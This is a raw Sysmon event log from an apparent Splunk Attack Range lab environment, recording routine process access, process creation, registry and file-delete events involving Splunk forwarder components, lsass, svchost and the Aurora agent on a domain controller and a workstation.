Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.574{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E3D2-63C7-1406-00000000AF02}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.575{FE4C2B44-E3D2-63C7-1406-00000000AF02}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000040984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000040983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002699c6) 13241300x800000000000000040982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2e-0xbb621116) 13241300x800000000000000040981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0x1d267916) 13241300x800000000000000040980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b3f-0x7eeae116) 13241300x800000000000000040979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000040978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002699c6) 13241300x800000000000000040977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2e-0xbb78744b) 13241300x800000000000000040976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0x1d3cdc4b) 13241300x800000000000000040975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:19:30.543{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b3f-0x7f01444b) 23542300x800000000000000040974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.418{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=D963215F70C6C363BEFB8D583F84B78E,SHA256=9AFB121E0537807700E537F6B7339276D23C43AEBCB5572E26955F75C3F13BDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.277{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A523283E6BF0A73241FFCB7E1790291,SHA256=4B09A2819DEF12EA099C03C767048346F4633BDDF49222E608B24F2DC1711484,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015801Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E3D2-63C7-F001-00000000B002}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015800Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015799Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015798Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015797Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015796Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015795Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015794Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015793Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015792Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015791Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E3D2-63C7-F001-00000000B002}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015790Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.452{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E3D2-63C7-F001-00000000B002}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015789Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.453{E5A8D418-E3D2-63C7-F001-00000000B002}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015788Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.278{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D99DB1620EF8B0FDA24A220ECA0A45AF,SHA256=A64C3B4BE11617D8B470A7A8265768531EEC185C496802B07EA86056A759AEAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015787Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:30.028{E5A8D418-E3D1-63C7-EF01-00000000B002}26521172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.177{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7503399E6E87B99D9FEB3D50CFFE18DC,SHA256=70ADE20574781EB01C55D67C82D92F76835A2182207D79D243AEFA6AF4BCC153,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.177{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=A84E51D981762BC41B807D47087BC249,SHA256=BFFCCBE83BB6D0B831579C1D199764BB955EF1B7A404702568820307A77462AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.867{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:31.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 